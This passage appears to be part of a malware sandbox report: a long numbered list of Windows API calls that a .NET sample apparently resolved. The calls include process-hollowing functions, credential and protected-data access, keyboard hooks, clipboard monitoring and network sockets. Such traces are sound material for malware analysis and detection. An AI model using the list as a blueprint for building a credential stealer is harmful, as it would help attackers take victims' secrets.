2490. "kernel32.dll.GetModuleFileNameW",
2491. "kernel32.dll.CreateFileW",
2492. "kernel32.dll.MultiByteToWideChar",
2493. "kernel32.dll.FlushInstructionCache",
2494. "kernel32.dll.GetCurrentProcess",
2495. "kernel32.dll.VirtualAlloc",
2496. "kernel32.dll.LoadLibraryA",
2497. "kernel32.dll.GetModuleFileNameA",
2498. "kernel32.dll.GetModuleHandleA",
2499. "kernel32.dll.VirtualProtect",
2500. "kernel32.dll.CloseHandle",
2501. "kernel32.dll.LoadResource",
2502. "kernel32.dll.FindResourceW",
2503. "kernel32.dll.GetProcAddress",
2504. "kernel32.dll.GetFileSize",
2505. "kernel32.dll.LCMapStringW",
2506. "kernel32.dll.LCMapStringA",
2507. "kernel32.dll.GetStringTypeW",
2508. "kernel32.dll.GetStringTypeA",
2509. "kernel32.dll.HeapAlloc",
2510. "kernel32.dll.GetStartupInfoW",
2511. "kernel32.dll.DeleteCriticalSection",
2512. "kernel32.dll.LeaveCriticalSection",
2513. "kernel32.dll.EnterCriticalSection",
2514. "kernel32.dll.HeapFree",
2515. "kernel32.dll.HeapReAlloc",
2516. "kernel32.dll.HeapCreate",
2517. "kernel32.dll.Sleep",
2518. "kernel32.dll.ExitProcess",
2519. "kernel32.dll.WriteFile",
2520. "kernel32.dll.GetStdHandle",
2521. "kernel32.dll.SetUnhandledExceptionFilter",
2522. "kernel32.dll.FreeEnvironmentStringsW",
2523. "kernel32.dll.GetEnvironmentStringsW",
2524. "kernel32.dll.GetCommandLineW",
2525. "kernel32.dll.SetHandleCount",
2526. "kernel32.dll.GetFileType",
2527. "kernel32.dll.GetStartupInfoA",
2528. "kernel32.dll.TlsGetValue",
2529. "kernel32.dll.TlsAlloc",
2530. "kernel32.dll.TlsSetValue",
2531. "kernel32.dll.TlsFree",
2532. "kernel32.dll.InterlockedIncrement",
2533. "kernel32.dll.SetLastError",
2534. "kernel32.dll.GetCurrentThreadId",
2535. "kernel32.dll.GetLastError",
2536. "kernel32.dll.InterlockedDecrement",
2537. "kernel32.dll.QueryPerformanceCounter",
2538. "kernel32.dll.GetTickCount",
2539. "kernel32.dll.GetCurrentProcessId",
2540. "kernel32.dll.GetSystemTimeAsFileTime",
2541. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
2542. "kernel32.dll.TerminateProcess",
2543. "kernel32.dll.UnhandledExceptionFilter",
2544. "kernel32.dll.IsDebuggerPresent",
2545. "kernel32.dll.RtlUnwind",
2546. "kernel32.dll.GetCPInfo",
2547. "kernel32.dll.GetACP",
2548. "kernel32.dll.GetOEMCP",
2549. "kernel32.dll.IsValidCodePage",
2550. "kernel32.dll.HeapSize",
2551. "kernel32.dll.GetLocaleInfoA",
2552. "kernel32.dll.WideCharToMultiByte",
2553. "psapi.dll.GetModuleInformation",
2554. "psapi.dll.GetModuleBaseNameW",
2555. "psapi.dll.EnumProcessModules",
2556. "shlwapi.dll.StrStrIW",
2557. "shlwapi.dll.PathFileExistsW",
2558. "kernel32.dll.FlsAlloc",
2559. "kernel32.dll.FlsGetValue",
2560. "kernel32.dll.FlsSetValue",
2561. "kernel32.dll.FlsFree",
2562. "mscoree.dll._CorExeMain",
2563. "kernel32.dll.IsProcessorFeaturePresent",
2564. "msvcrt.dll._set_error_mode",
2565. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
2566. "kernel32.dll.FindActCtxSectionStringW",
2567. "kernel32.dll.GetSystemWindowsDirectoryW",
2568. "mscoree.dll.GetProcessExecutableHeap",
2569. "kernelbase.dll.InitializeCriticalSectionAndSpinCount",
2570. "kernel32.dll.ProcessIdToSessionId",
2571. "imm32.dll.ImmCreateContext",
2572. "imm32.dll.ImmDestroyContext",
2573. "imm32.dll.ImmNotifyIME",
2574. "imm32.dll.ImmAssociateContext",
2575. "imm32.dll.ImmReleaseContext",
2576. "imm32.dll.ImmGetContext",
2577. "imm32.dll.ImmGetCompositionStringA",
2578. "imm32.dll.ImmSetCompositionStringA",
2579. "imm32.dll.ImmGetCompositionStringW",
2580. "imm32.dll.ImmSetCompositionStringW",
2581. "imm32.dll.ImmSetCandidateWindow",
2582. "mscorwks.dll.GetCLRFunction",
2583. "mscoree.dll.IEE",
2584. "kernel32.dll.QueryActCtxW",
2585. "shlwapi.dll.UrlIsW",
2586. "mscorwks.dll.IEE",
2587. "ntdll.dll.ZwCreateSection",
2588. "kernel32.dll.MapViewOfFile",
2589. "kernel32.dll.LoadLibraryExW",
2590. "mscorwks.dll._CorExeMain",
2591. "advapi32.dll.RegisterTraceGuidsW",
2592. "advapi32.dll.UnregisterTraceGuids",
2593. "advapi32.dll.GetTraceLoggerHandle",
2594. "advapi32.dll.GetTraceEnableLevel",
2595. "advapi32.dll.GetTraceEnableFlags",
2596. "advapi32.dll.TraceEvent",
2597. "mscoree.dll.GetStartupFlags",
2598. "mscoree.dll.GetHostConfigurationFile",
2599. "mscoree.dll.GetCORSystemDirectory",
2600. "ntdll.dll.RtlUnwind",
2601. "kernel32.dll.IsWow64Process",
2602. "advapi32.dll.AllocateAndInitializeSid",
2603. "advapi32.dll.OpenProcessToken",
2604. "advapi32.dll.GetTokenInformation",
2605. "advapi32.dll.InitializeAcl",
2606. "advapi32.dll.AddAccessAllowedAce",
2607. "advapi32.dll.FreeSid",
2608. "kernel32.dll.SetThreadStackGuarantee",
2609. "kernel32.dll.AddVectoredContinueHandler",
2610. "kernel32.dll.RemoveVectoredContinueHandler",
2611. "advapi32.dll.ConvertSidToStringSidW",
2612. "shell32.dll.SHGetFolderPathW",
2613. "kernel32.dll.FlushProcessWriteBuffers",
2614. "kernel32.dll.GetWriteWatch",
2615. "kernel32.dll.ResetWriteWatch",
2616. "kernel32.dll.CreateMemoryResourceNotification",
2617. "kernel32.dll.QueryMemoryResourceNotification",
2618. "mscoree.dll._CorImageUnloading",
2619. "mscoree.dll._CorValidateImage",
2620. "cryptbase.dll.SystemFunction036",
2621. "uxtheme.dll.ThemeInitApiHook",
2622. "user32.dll.IsProcessDPIAware",
2623. "ole32.dll.CoGetContextToken",
2624. "kernel32.dll.GetVersionExW",
2625. "kernel32.dll.GetFullPathNameW",
2626. "advapi32.dll.CryptAcquireContextA",
2627. "advapi32.dll.CryptReleaseContext",
2628. "advapi32.dll.CryptCreateHash",
2629. "advapi32.dll.CryptDestroyHash",
2630. "advapi32.dll.CryptHashData",
2631. "advapi32.dll.CryptGetHashParam",
2632. "advapi32.dll.CryptImportKey",
2633. "advapi32.dll.CryptExportKey",
2634. "advapi32.dll.CryptGenKey",
2635. "advapi32.dll.CryptGetKeyParam",
2636. "advapi32.dll.CryptDestroyKey",
2637. "advapi32.dll.CryptVerifySignatureA",
2638. "advapi32.dll.CryptSignHashA",
2639. "advapi32.dll.CryptGetProvParam",
2640. "advapi32.dll.CryptGetUserKey",
2641. "advapi32.dll.CryptEnumProvidersA",
2642. "mscoree.dll.GetMetaDataInternalInterface",
2643. "mscorwks.dll.GetMetaDataInternalInterface",
2644. "cryptsp.dll.CryptAcquireContextA",
2645. "cryptsp.dll.CryptImportKey",
2646. "cryptsp.dll.CryptCreateHash",
2647. "cryptsp.dll.CryptHashData",
2648. "cryptsp.dll.CryptVerifySignatureA",
2649. "cryptsp.dll.CryptDestroyHash",
2650. "cryptsp.dll.CryptDestroyKey",
2651. "mscorjit.dll.getJit",
2652. "user32.dll.RegisterWindowMessageW",
2653. "kernel32.dll.GetCurrentThread",
2654. "kernel32.dll.DuplicateHandle",
2655. "kernel32.dll.lstrlen",
2656. "kernel32.dll.lstrlenW",
2657. "user32.dll.DefWindowProcW",
2658. "gdi32.dll.GetStockObject",
2659. "kernel32.dll.GetUserDefaultUILanguage",
2660. "user32.dll.RegisterClassW",
2661. "ole32.dll.CoTaskMemAlloc",
2662. "ole32.dll.CoTaskMemFree",
2663. "user32.dll.CreateWindowExW",
2664. "user32.dll.SetWindowLongW",
2665. "user32.dll.GetWindowLongW",
2666. "user32.dll.CallWindowProcW",
2667. "user32.dll.GetClientRect",
2668. "user32.dll.GetWindowRect",
2669. "user32.dll.GetParent",
2670. "ole32.dll.IIDFromString",
2671. "kernel32.dll.LocalFree",
2672. "kernel32.dll.LocalAlloc",
2673. "mscoree.dll.ND_RI4",
2674. "mscoree.dll.ND_RU1",
2675. "advapi32.dll.LsaClose",
2676. "advapi32.dll.LsaFreeMemory",
2677. "advapi32.dll.LsaOpenPolicy",
2678. "advapi32.dll.LsaLookupSids",
2679. "advapi32.dll.LsaLookupNames2",
2680. "kernel32.dll.CreateEventW",
2681. "ws2_32.dll.WSAStartup",
2682. "ws2_32.dll.WSASocketW",
2683. "ws2_32.dll.setsockopt",
2684. "ws2_32.dll.WSAEventSelect",
2685. "ws2_32.dll.ioctlsocket",
2686. "ws2_32.dll.closesocket",
2687. "kernel32.dll.GetFileAttributesExW",
2688. "kernel32.dll.SetErrorMode",
2689. "kernel32.dll.ReadFile",
2690. "mscoree.dll.ND_RI2",
2691. "kernel32.dll.GetComputerNameW",
2692. "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
2693. "kernel32.dll.CreateFileMappingW",
2694. "kernel32.dll.UnmapViewOfFile",
2695. "kernel32.dll.VirtualQuery",
2696. "kernel32.dll.ReleaseMutex",
2697. "advapi32.dll.CreateWellKnownSid",
2698. "kernel32.dll.CreateMutexW",
2699. "kernel32.dll.WaitForSingleObject",
2700. "kernel32.dll.OpenMutexW",
2701. "kernel32.dll.OpenProcess",
2702. "kernel32.dll.GetProcessTimes",
2703. "ws2_32.dll.inet_addr",
2704. "ws2_32.dll.bind",
2705. "ws2_32.dll.listen",
2706. "ws2_32.dll.getsockname",
2707. "ws2_32.dll.accept",
2708. "kernel32.dll.CreateIoCompletionPort",
2709. "kernel32.dll.PostQueuedCompletionStatus",
2710. "ntdll.dll.NtQueryInformationThread",
2711. "ntdll.dll.NtQuerySystemInformation",
2712. "ntdll.dll.NtGetCurrentProcessorNumber",
2713. "ole32.dll.CoCreateGuid",
2714. "cryptsp.dll.CryptAcquireContextW",
2715. "kernel32.dll.SetEvent",
2716. "uxtheme.dll.IsAppThemed",
2717. "kernel32.dll.CreateActCtxA",
2718. "user32.dll.AdjustWindowRectEx",
2719. "kernel32.dll.GetTempPathW",
2720. "shfolder.dll.SHGetFolderPathW",
2721. "culture.dll.ConvertLangIdToCultureName",
2722. "gdi32.dll.CreateCompatibleDC",
2723. "kernel32.dll.GetSystemDefaultLCID",
2724. "gdi32.dll.GetObjectW",
2725. "user32.dll.GetDC",
2726. "kernel32.dll.FindAtomW",
2727. "kernel32.dll.AddAtomW",
2728. "mscoree.dll.LoadLibraryShim",
2729. "gdiplus.dll.GdiplusStartup",
2730. "user32.dll.GetWindowInfo",
2731. "user32.dll.GetAncestor",
2732. "user32.dll.EnumDisplayDevicesA",
2733. "gdi32.dll.ExtTextOutW",
2734. "gdiplus.dll.GdipCreateFontFromLogfontW",
2735. "kernel32.dll.RegOpenKeyExW",
2736. "kernel32.dll.RegQueryInfoKeyA",
2737. "kernel32.dll.RegCloseKey",
2738. "kernel32.dll.RegCreateKeyExW",
2739. "kernel32.dll.RegQueryValueExW",
2740. "kernel32.dll.RegEnumValueW",
2741. "kernel32.dll.RegQueryInfoKeyW",
2742. "gdiplus.dll.GdipGetFontUnit",
2743. "gdiplus.dll.GdipGetFontSize",
2744. "gdiplus.dll.GdipGetFontStyle",
2745. "gdiplus.dll.GdipGetFamily",
2746. "user32.dll.ReleaseDC",
2747. "gdiplus.dll.GdipCreateFromHDC",
2748. "gdiplus.dll.GdipGetDpiY",
2749. "gdiplus.dll.GdipGetFontHeight",
2750. "gdiplus.dll.GdipGetEmHeight",
2751. "gdiplus.dll.GdipGetLineSpacing",
2752. "gdiplus.dll.GdipDeleteGraphics",
2753. "gdiplus.dll.GdipCreateFont",
2754. "gdiplus.dll.GdipDeleteFont",
2755. "gdiplus.dll.GdipGetLogFontW",
2756. "mscoree.dll.ND_WU1",
2757. "gdi32.dll.CreateFontIndirectW",
2758. "gdi32.dll.SelectObject",
2759. "gdi32.dll.GetTextMetricsW",
2760. "gdi32.dll.GetTextExtentPoint32W",
2761. "gdi32.dll.DeleteDC",
2762. "kernel32.dll.GetCurrentActCtx",
2763. "kernel32.dll.ActivateActCtx",
2764. "user32.dll.SetWindowTextW",
2765. "user32.dll.GetProcessWindowStation",
2766. "user32.dll.GetUserObjectInformationA",
2767. "kernel32.dll.SetConsoleCtrlHandler",
2768. "user32.dll.GetClassInfoW",
2769. "user32.dll.GetWindowPlacement",
2770. "user32.dll.GetWindowTextLengthW",
2771. "user32.dll.GetWindowTextW",
2772. "user32.dll.SendMessageW",
2773. "user32.dll.GetSystemMenu",
2774. "user32.dll.EnableMenuItem",
2775. "gdi32.dll.GetDeviceCaps",
2776. "user32.dll.CreateIconFromResourceEx",
2777. "user32.dll.SetWindowPos",
2778. "user32.dll.RedrawWindow",
2779. "user32.dll.ShowWindow",
2780. "bcrypt.dll.BCryptGetFipsAlgorithmMode",
2781. "cryptsp.dll.CryptGetHashParam",
2782. "iphlpapi.dll.GetNetworkParams",
2783. "dnsapi.dll.DnsQueryConfig",
2784. "iphlpapi.dll.GetAdaptersAddresses",
2785. "iphlpapi.dll.GetIpInterfaceEntry",
2786. "iphlpapi.dll.GetBestInterfaceEx",
2787. "iphlpapi.dll.GetAdaptersInfo",
2788. "iphlpapi.dll.GetIfEntry",
2789. "iphlpapi.dll.GetPerAdapterInfo",
2790. "ws2_32.dll.gethostname",
2791. "ws2_32.dll.getaddrinfo",
2792. "ws2_32.dll.freeaddrinfo",
2793. "rasapi32.dll.RasEnumConnectionsW",
2794. "rtutils.dll.TraceRegisterExA",
2795. "rtutils.dll.TracePrintfExA",
2796. "sechost.dll.OpenSCManagerW",
2797. "sechost.dll.OpenServiceW",
2798. "sechost.dll.QueryServiceStatus",
2799. "sechost.dll.CloseServiceHandle",
2800. "ws2_32.dll.WSAIoctl",
2801. "kernel32.dll.FormatMessageW",
2802. "rasapi32.dll.RasConnectionNotificationW",
2803. "advapi32.dll.RegOpenCurrentUser",
2804. "advapi32.dll.RegNotifyChangeKeyValue",
2805. "sechost.dll.NotifyServiceStatusChangeA",
2806. "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
2807. "kernel32.dll.SwitchToThread",
2808. "kernel32.dll.ResetEvent",
2809. "ole32.dll.CoWaitForMultipleHandles",
2810. "sechost.dll.LookupAccountNameLocalW",
2811. "advapi32.dll.LookupAccountSidW",
2812. "sechost.dll.LookupAccountSidLocalW",
2813. "cryptsp.dll.CryptGenRandom",
2814. "ole32.dll.NdrOleInitializeExtension",
2815. "ole32.dll.CoGetClassObject",
2816. "ole32.dll.CoGetMarshalSizeMax",
2817. "ole32.dll.CoMarshalInterface",
2818. "ole32.dll.CoUnmarshalInterface",
2819. "ole32.dll.StringFromIID",
2820. "ole32.dll.CoGetPSClsid",
2821. "ole32.dll.CoCreateInstance",
2822. "ole32.dll.CoReleaseMarshalData",
2823. "ole32.dll.DcomChannelSetHResult",
2824. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
2825. "ws2_32.dll.WSAConnect",
2826. "ws2_32.dll.send",
2827. "ws2_32.dll.recv",
2828. "ole32.dll.CoCreateFreeThreadedMarshaler",
2829. "ole32.dll.CoGetObjectContext",
2830. "oleaut32.dll.#2",
2831. "oleaut32.dll.#6",
2832. "wminet_utils.dll.ResetSecurity",
2833. "wminet_utils.dll.SetSecurity",
2834. "wminet_utils.dll.BlessIWbemServices",
2835. "wminet_utils.dll.BlessIWbemServicesObject",
2836. "wminet_utils.dll.GetPropertyHandle",
2837. "wminet_utils.dll.WritePropertyValue",
2838. "wminet_utils.dll.Clone",
2839. "wminet_utils.dll.VerifyClientKey",
2840. "wminet_utils.dll.GetQualifierSet",
2841. "wminet_utils.dll.Get",
2842. "wminet_utils.dll.Put",
2843. "wminet_utils.dll.Delete",
2844. "wminet_utils.dll.GetNames",
2845. "wminet_utils.dll.BeginEnumeration",
2846. "wminet_utils.dll.Next",
2847. "wminet_utils.dll.EndEnumeration",
2848. "wminet_utils.dll.GetPropertyQualifierSet",
2849. "wminet_utils.dll.GetObjectText",
2850. "wminet_utils.dll.SpawnDerivedClass",
2851. "wminet_utils.dll.SpawnInstance",
2852. "wminet_utils.dll.CompareTo",
2853. "wminet_utils.dll.GetPropertyOrigin",
2854. "wminet_utils.dll.InheritsFrom",
2855. "wminet_utils.dll.GetMethod",
2856. "wminet_utils.dll.PutMethod",
2857. "wminet_utils.dll.DeleteMethod",
2858. "wminet_utils.dll.BeginMethodEnumeration",
2859. "wminet_utils.dll.NextMethod",
2860. "wminet_utils.dll.EndMethodEnumeration",
2861. "wminet_utils.dll.GetMethodQualifierSet",
2862. "wminet_utils.dll.GetMethodOrigin",
2863. "wminet_utils.dll.QualifierSet_Get",
2864. "wminet_utils.dll.QualifierSet_Put",
2865. "wminet_utils.dll.QualifierSet_Delete",
2866. "wminet_utils.dll.QualifierSet_GetNames",
2867. "wminet_utils.dll.QualifierSet_BeginEnumeration",
2868. "wminet_utils.dll.QualifierSet_Next",
2869. "wminet_utils.dll.QualifierSet_EndEnumeration",
2870. "wminet_utils.dll.GetCurrentApartmentType",
2871. "wminet_utils.dll.GetDemultiplexedStub",
2872. "wminet_utils.dll.CreateInstanceEnumWmi",
2873. "wminet_utils.dll.CreateClassEnumWmi",
2874. "wminet_utils.dll.ExecQueryWmi",
2875. "wminet_utils.dll.ExecNotificationQueryWmi",
2876. "wminet_utils.dll.PutInstanceWmi",
2877. "wminet_utils.dll.PutClassWmi",
2878. "wminet_utils.dll.CloneEnumWbemClassObject",
2879. "wminet_utils.dll.ConnectServerWmi",
2880. "kernel32.dll.GetThreadPreferredUILanguages",
2881. "kernel32.dll.SetThreadPreferredUILanguages",
2882. "kernel32.dll.LocaleNameToLCID",
2883. "kernel32.dll.GetLocaleInfoEx",
2884. "kernel32.dll.LCIDToLocaleName",
2885. "kernel32.dll.GetSystemDefaultLocaleName",
2886. "ole32.dll.CoUninitialize",
2887. "oleaut32.dll.#500",
2888. "user32.dll.BeginPaint",
2889. "gdiplus.dll.GdipCreateHalftonePalette",
2890. "gdi32.dll.SelectPalette",
2891. "user32.dll.EndPaint",
2892. "oleaut32.dll.SysStringLen",
2893. "kernel32.dll.RtlZeroMemory",
2894. "oleaut32.dll.#283",
2895. "oleaut32.dll.#284",
2896. "advapi32.dll.RegSetValueExW",
2897. "kernel32.dll.SetFileAttributesW",
2898. "kernel32.dll.GetSystemDefaultUILanguage",
2899. "advapi32.dll.LookupPrivilegeValueW",
2900. "advapi32.dll.AdjustTokenPrivileges",
2901. "psapi.dll.GetModuleFileNameExW",
2902. "user32.dll.SetWindowsHookExA",
2903. "user32.dll.SetClipboardViewer",
2904. "ole32.dll.OleInitialize",
2905. "ole32.dll.OleGetClipboard",
2906. "kernel32.dll.GlobalLock",
2907. "kernel32.dll.GlobalUnlock",
2908. "kernel32.dll.GlobalFree",
2909. "user32.dll.SetForegroundWindow",
2910. "ole32.dll.CoRegisterMessageFilter",
2911. "user32.dll.SetFocus",
2912. "user32.dll.GetWindowThreadProcessId",
2913. "user32.dll.PostMessageW",
2914. "user32.dll.PeekMessageW",
2915. "user32.dll.IsWindowUnicode",
2916. "user32.dll.GetMessageW",
2917. "user32.dll.TranslateMessage",
2918. "user32.dll.DispatchMessageW",
2919. "user32.dll.WaitMessage",
2920. "oleaut32.dll.#9",
2921. "oleaut32.dll.#7",
2922. "kernel32.dll.CreateSemaphoreA",
2923. "ws2_32.dll.shutdown",
2924. "kernel32.dll.ReleaseSemaphore",
2925. "kernel32.dll.CreateProcessA",
2926. "ntdll.dll.NtUnmapViewOfSection",
2927. "kernel32.dll.VirtualAllocEx",
2928. "ntdll.dll.NtWriteVirtualMemory",
2929. "ntdll.dll.NtGetContextThread",
2930. "ntdll.dll.NtSetContextThread",
2931. "ntdll.dll.NtResumeThread",
2932. "kernel32.dll.GlobalMemoryStatusEx",
2933. "kernel32.dll.DeleteFileW",
2934. "advapi32.dll.CheckTokenMembership",
2935. "version.dll.GetFileVersionInfoSizeW",
2936. "version.dll.GetFileVersionInfoW",
2937. "version.dll.VerQueryValueW",
2938. "mscoree.dll.DllGetClassObject",
2939. "diasymreader.dll.DllGetClassObjectInternal",
2940. "kernel32.dll.SortGetHandle",
2941. "kernel32.dll.SortCloseHandle",
2942. "ntmarta.dll.GetMartaExtensionInterface",
2943. "fastprox.dll.DllGetClassObject",
2944. "fastprox.dll.DllCanUnloadNow",
2945. "oleaut32.dll.#289",
2946. "advapi32.dll.RegOpenKeyW",
2947. "oleaut32.dll.#287",
2948. "oleaut32.dll.#288",
2949. "oleaut32.dll.#290",
2950. "oleaut32.dll.#285",
2951. "winbrand.dll.BrandingLoadString",
2952. "security.dll.InitSecurityInterfaceW",
2953. "cryptsp.dll.SystemFunction035",
2954. "schannel.dll.SpUserModeInitialize",
2955. "advapi32.dll.RegCreateKeyExW",
2956. "ntdll.dll.RtlInitUnicodeString",
2957. "ntdll.dll.RtlFreeUnicodeString",
2958. "ntdll.dll.NtSetSystemEnvironmentValue",
2959. "ntdll.dll.NtQuerySystemEnvironmentValue",
2960. "ntdll.dll.NtCreateFile",
2961. "ntdll.dll.NtQueryDirectoryObject",
2962. "ntdll.dll.NtQueryObject",
2963. "ntdll.dll.NtOpenDirectoryObject",
2964. "ntdll.dll.NtQueryInformationProcess",
2965. "ntdll.dll.NtQueryInformationToken",
2966. "ntdll.dll.NtOpenFile",
2967. "ntdll.dll.NtClose",
2968. "ntdll.dll.NtFsControlFile",
2969. "ntdll.dll.NtQueryVolumeInformationFile",
2970. "oleaut32.dll.#286",
2971. "netapi32.dll.NetGroupEnum",
2972. "netapi32.dll.NetGroupGetInfo",
2973. "netapi32.dll.NetGroupSetInfo",
2974. "netapi32.dll.NetLocalGroupGetInfo",
2975. "netapi32.dll.NetLocalGroupSetInfo",
2976. "netapi32.dll.NetGroupGetUsers",
2977. "netapi32.dll.NetLocalGroupGetMembers",
2978. "netapi32.dll.NetLocalGroupEnum",
2979. "netapi32.dll.NetShareEnum",
2980. "netapi32.dll.NetShareGetInfo",
2981. "netapi32.dll.NetShareAdd",
2982. "netapi32.dll.NetShareEnumSticky",
2983. "netapi32.dll.NetShareSetInfo",
2984. "netapi32.dll.NetShareDel",
2985. "netapi32.dll.NetShareDelSticky",
2986. "netapi32.dll.NetShareCheck",
2987. "netapi32.dll.NetUserEnum",
2988. "netapi32.dll.NetUserGetInfo",
2989. "netapi32.dll.NetUserSetInfo",
2990. "netapi32.dll.NetApiBufferFree",
2991. "netapi32.dll.NetQueryDisplayInformation",
2992. "netapi32.dll.NetServerSetInfo",
2993. "netapi32.dll.NetServerGetInfo",
2994. "netapi32.dll.NetGetDCName",
2995. "netapi32.dll.NetWkstaGetInfo",
2996. "netapi32.dll.NetGetAnyDCName",
2997. "netapi32.dll.NetServerEnum",
2998. "netapi32.dll.NetUserModalsGet",
2999. "netapi32.dll.NetScheduleJobAdd",
3000. "netapi32.dll.NetScheduleJobDel",
3001. "netapi32.dll.NetScheduleJobEnum",
3002. "netapi32.dll.NetScheduleJobGetInfo",
3003. "netapi32.dll.NetUseGetInfo",
3004. "netapi32.dll.NetEnumerateTrustedDomains",
3005. "netapi32.dll.DsGetDcNameW",
3006. "netapi32.dll.DsRoleGetPrimaryDomainInformation",
3007. "netapi32.dll.DsRoleFreeMemory",
3008. "netapi32.dll.NetRenameMachineInDomain",
3009. "netapi32.dll.NetJoinDomain",
3010. "netapi32.dll.NetUnjoinDomain",
3011. "wkscli.dll.NetWkstaGetInfo",
3012. "cscapi.dll.CscNetApiGetInterface",
3013. "kernel32.dll.GetDiskFreeSpaceExW",
3014. "kernel32.dll.GetVolumePathNameW",
3015. "kernel32.dll.CreateToolhelp32Snapshot",
3016. "kernel32.dll.Thread32First",
3017. "kernel32.dll.Thread32Next",
3018. "kernel32.dll.Process32First",
3019. "kernel32.dll.Process32Next",
3020. "kernel32.dll.Module32First",
3021. "kernel32.dll.Module32Next",
3022. "kernel32.dll.Heap32ListFirst",
3023. "oleaut32.dll.#8",
3024. "oleaut32.dll.#15",
3025. "oleaut32.dll.#26",
3026. "ole32.dll.StringFromCLSID",
3027. "ntdll.dll.EtwUnregisterTraceGuids",
3028. "cryptsp.dll.CryptReleaseContext",
3029. "comctl32.dll.InitCommonControlsEx",
3030. "shell32.dll.SHGetSpecialFolderPathA",
3031. "pstorec.dll.PStoreCreateInstance",
3032. "crypt32.dll.CryptUnprotectData",
3033. "advapi32.dll.CredReadA",
3034. "advapi32.dll.CredFree",
3035. "advapi32.dll.CredDeleteA",
3036. "advapi32.dll.CredEnumerateA",
3037. "advapi32.dll.CredEnumerateW",
3038. "wer.dll.WerReportCreate",
3039. "wer.dll.WerReportSetParameter",
3040. "wer.dll.WerReportAddFile",
3041. "wer.dll.WerReportSetUIOption",
3042. "wer.dll.WerReportSubmit",
3043. "wer.dll.WerReportAddDump",
3044. "wer.dll.WerReportCloseHandle",
3045. "user32.dll.LoadStringW",
3046. "advapi32.dll.RegGetValueW",
3047. "user32.dll.GetThreadDesktop",
3048. "user32.dll.GetUserObjectInformationW",
3049. "sensapi.dll.IsNetworkAlive",
3050. "rpcrt4.dll.RpcBindingFromStringBindingW",
3051. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
3052. "rpcrt4.dll.NdrClientCall2",
3053. "user32.dll.CharUpperW",
3054. "werui.dll.WerUICreate",
3055. "werui.dll.WerUIStart",
3056. "ole32.dll.CoInitialize",
3057. "kernel32.dll.CreateActCtxW",
3058. "dui70.dll.InitProcessPriv",
3059. "kernel32.dll.DeactivateActCtx",
3060. "comctl32.dll.LoadIconWithScaleDown",
3061. "ntdll.dll.RtlRunEncodeUnicodeString",
3062. "ntdll.dll.RtlRunDecodeUnicodeString",
3063. "dui70.dll.InitThread",
3064. "duser.dll.InitGadgets",
3065. "user32.dll.RegisterMessagePumpHook",
3066. "dui70.dll.?GetClassInfoPtr@CCBase@DirectUI@@SGPAUIClassInfo@2@XZ",
3067. "dui70.dll.?GetFactoryLock@Element@DirectUI@@SGPAU_RTL_CRITICAL_SECTION@@XZ",
3068. "dui70.dll.??0CritSecLock@DirectUI@@QAE@PAU_RTL_CRITICAL_SECTION@@@Z",
3069. "dui70.dll.?ClassExist@ClassInfoBase@DirectUI@@SG_NPAPAUIClassInfo@2@PBQBUPropertyInfo@2@IPAU32@PAUHINSTANCE__@@PBG_N@Z",
3070. "dui70.dll.??0ClassInfoBase@DirectUI@@QAE@XZ",
3071. "dui70.dll.?Initialize@ClassInfoBase@DirectUI@@QAEJPAUHINSTANCE__@@PBG_NPBQBUPropertyInfo@2@I@Z",
3072. "dui70.dll.?Register@ClassInfoBase@DirectUI@@QAEJXZ",
3073. "dui70.dll.?IsGlobal@ClassInfoBase@DirectUI@@UBE_NXZ",
3074. "dui70.dll.?GetName@ClassInfoBase@DirectUI@@UBEPBGXZ",
3075. "dui70.dll.?GetModule@ClassInfoBase@DirectUI@@UBEPAUHINSTANCE__@@XZ",
3076. "dui70.dll.??1CritSecLock@DirectUI@@QAE@XZ",
3077. "dui70.dll.??0CCBase@DirectUI@@QAE@KPBG@Z",
3078. "dui70.dll.?Initialize@CCBase@DirectUI@@QAEJIPAVElement@2@PAK@Z",
3079. "duser.dll.CreateGadget",
3080. "duser.dll.SetGadgetMessageFilter",
3081. "duser.dll.SetGadgetStyle",
3082. "dui70.dll.?OnPropertyChanging@Element@DirectUI@@UAE_NPBUPropertyInfo@2@HPAVValue@2@1@Z",
3083. "dui70.dll.?HandleUiaPropertyChangingListener@Element@DirectUI@@UAEXPBUPropertyInfo@2@@Z",
3084. "dui70.dll.?HandleUiaPropertyListener@Element@DirectUI@@UAEXPBUPropertyInfo@2@HPAVValue@2@1@Z",
3085. "dui70.dll.?DirectionProp@Element@DirectUI@@SGPBUPropertyInfo@2@XZ",
3086. "dui70.dll.?OnPropertyChanged@CCBase@DirectUI@@UAEXPBUPropertyInfo@2@HPAVValue@2@1@Z",
3087. "dui70.dll.?SetFontSize@Element@DirectUI@@QAEJH@Z",
3088. "dui70.dll.?SetWidth@Element@DirectUI@@QAEJH@Z",
3089. "dui70.dll.?SetHeight@Element@DirectUI@@QAEJH@Z",
3090. "dui70.dll.?EndDefer@Element@DirectUI@@QAEXK@Z",
3091. "dui70.dll.?OnGroupChanged@Element@DirectUI@@UAEXH_N@Z",
3092. "duser.dll.InvalidateGadget",
3093. "dui70.dll.CreateDUIWrapper",
3094. "dui70.dll.?SetNotifyHandler@CCBase@DirectUI@@QAEXP6GHIIJPAJPAX@Z1@Z",
3095. "shell32.dll.ExtractIconExW",
3096. "comctl32.dll.TaskDialogIndirect",
3097. "uxtheme.dll.IsThemeActive",
3098. "duser.dll.SetGadgetRootInfo",
3099. "uxtheme.dll.GetThemeAppProperties",
3100. "ole32.dll.CreateStreamOnHGlobal",
3101. "xmllite.dll.CreateXmlReader",
3102. "xmllite.dll.CreateXmlReaderInputWithEncodingName",
3103. "uxtheme.dll.OpenThemeData",
3104. "uxtheme.dll.GetThemeMargins",
3105. "uxtheme.dll.GetThemeFont",
3106. "uxtheme.dll.GetThemeColor",
3107. "uxtheme.dll.GetThemeMetric",
3108. "duser.dll.SetGadgetParent",
3109. "duser.dll.GetDUserModule",
3110. "duser.dll.FindStdColor",
3111. "duser.dll.AttachWndProcW",
3112. "kernel32.dll.InterlockedPopEntrySList",
3113. "kernel32.dll.InterlockedPushEntrySList",
3114. "kernel32.dll.InterlockedCompareExchange",
3115. "comctl32.dll.RegisterClassNameW",
3116. "duser.dll.GetGadgetRect",
3117. "duser.dll.GetGadgetRgn",
